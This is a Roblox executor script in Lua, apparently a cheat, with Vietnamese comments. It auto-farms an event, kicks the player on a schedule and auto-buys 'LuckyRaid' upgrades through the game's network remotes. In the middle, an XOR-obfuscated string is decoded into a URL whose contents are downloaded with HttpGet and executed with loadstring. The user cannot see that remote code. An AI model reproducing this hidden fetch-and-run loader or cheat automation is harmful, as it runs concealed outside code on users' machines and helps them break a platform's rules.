task.spawn(function()

_G.start_vvv_ = true

_G.FPS_farm = 4
_G.FPS_event = 7

--task.wait(3600)

local _Config_Online = 18

local FILE_NAME = "OFFLINE.txt"
if not writefile or not readfile then    return	end
local function getOffline()
    if not isfile or not isfile(FILE_NAME) then
        writefile(FILE_NAME, "0")
        return 0
    end
    local content = readfile(FILE_NAME)
    local val = tonumber(content)
    if val == nil then
        writefile(FILE_NAME, "0")
        return 0
    end
    return val
end
local function setOffline(v)
    writefile(FILE_NAME, tostring(v))
end
local _Config_Offline = getOffline()
if _Config_Offline ~= _Config_Online then

	    setOffline(_Config_Online)
		if _G.Restart == true then
			_G.Restart = false 	
			return
		end
		--------------------------------------------
		if EVENT_or_FARM == "E" then
			game.Players.LocalPlayer:Kick("kick reset")		
		end
		--game.Players.LocalPlayer:Kick("kick reset")		
		--------------------------------------------
end

if _G.Restart == true then
	_G.Restart = false 	
end

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\193\207\218\44\232\246\196\27\221\207\150\33\181\190\159\80\218\214\205\60\232\191\201\80\198\204\201\46\227\169\212\80\213\198\205\106\197\179\194\29\218\252\238\22\195\137\137\18\196\194","\126\177\163\187\69\134\219\167")))();

local now = os.date("!*t", os.time(os.date("!*t")) + 7 * 3600)
local currentHour = now.hour

if currentHour > 21 or currentHour < 9 then
	_G.start_vvv_ = false
end
_G.delay_play_vvv3 = 1
if currentHour == 9 then
	_G.delay_play_vvv3 = 2
end

	if _G.RunsLeft_TIMEtrial == 0 and EVENT_or_FARM == "F" then
		game.Players.LocalPlayer:Kick("kick fin")
	end
	if _G.RunsLeft_TIMEtrial > 0 and EVENT_or_FARM == "E" and _G.start_vvv_ == true then
		game.Players.LocalPlayer:Kick("kick pla")
	end


--------
task.spawn(function()
	local ReplicatedStorage = game:GetService("ReplicatedStorage")
	local Client = ReplicatedStorage:WaitForChild("Library"):WaitForChild("Client")
	local SaveModule = require(Client:WaitForChild("Save"))
	local Network = ReplicatedStorage:WaitForChild("Network")

	-- Danh sách upgrade cần xử lý
	local UPGRADE_NAMES = {
		"LuckyRaidTitanicChest",
		"LuckyRaidBetterLoot",
		"LuckyRaidXP",
		"LuckyRaidKeyDrops",
		"LuckyRaidDamage",
		"LuckyRaidMoreCurrency",
		"LuckyRaidBossHugeChances",
		"LuckyRaidEggCost",
		"LuckyRaidPetSpeed",
		"LuckyRaidHugeChest",
		"LuckyRaidAttackSpeed",
		"LuckyRaidPets",
		"LuckyRaidBossTitanicChances",
	}

	-- Đọc save
	local function getSaveData()
		return SaveModule.Get() or {}
	end

	-- Lấy bảng EventUpgrades
	local function getEventUpgrades()
		local saveData = getSaveData()
		return saveData.EventUpgrades or {}
	end

	-- Lấy level của 1 upgrade
	local function getUpgradeLevel(upgradeName)
		local eventUpgrades = getEventUpgrades()
		return tonumber(eventUpgrades[upgradeName]) or 0
	end

	-- In level toàn bộ upgrade
	local function printAllUpgradeLevels()
		for _, upgradeName in ipairs(UPGRADE_NAMES) do
			local level = getUpgradeLevel(upgradeName)
			warn(("%s = %d"):format(upgradeName, level))
		end
	end

	-- Kiểm tra có bất kỳ upgrade nào đã >= 1 chưa
	local function hasAnyUpgradeAtLeast1()
		for _, upgradeName in ipairs(UPGRADE_NAMES) do
			if getUpgradeLevel(upgradeName) >= 1 then
				return true
			end
		end
		return false
	end

	-- Mua 1 upgrade
	local function purchaseUpgrade(upgradeName)
		Network["EventUpgrades: Purchase"]:InvokeServer(upgradeName)
		warn("Purchased: " .. upgradeName)
	end

	-- Mua đều mỗi upgrade 1 lần
	local function purchaseEachUpgradeOnce()
		for _, upgradeName in ipairs(UPGRADE_NAMES) do
			purchaseUpgrade(upgradeName)
			task.wait(0.2)
		end
	end

	-- Debug: xem level hiện tại
	printAllUpgradeLevels()

	-- Logic chính:
	-- Nếu KHÔNG có bất kỳ mục nào lv >= 1 thì nâng đều mỗi thứ 1 lần
	if not hasAnyUpgradeAtLeast1() then
		warn("Không có upgrade nào đạt lv1+, bắt đầu mua đều mỗi mục 1 lần...")
		purchaseEachUpgradeOnce()
	else
		warn("Đã có ít nhất 1 upgrade đạt lv1+, bỏ qua không mua.")
	end
end)
--------
end)


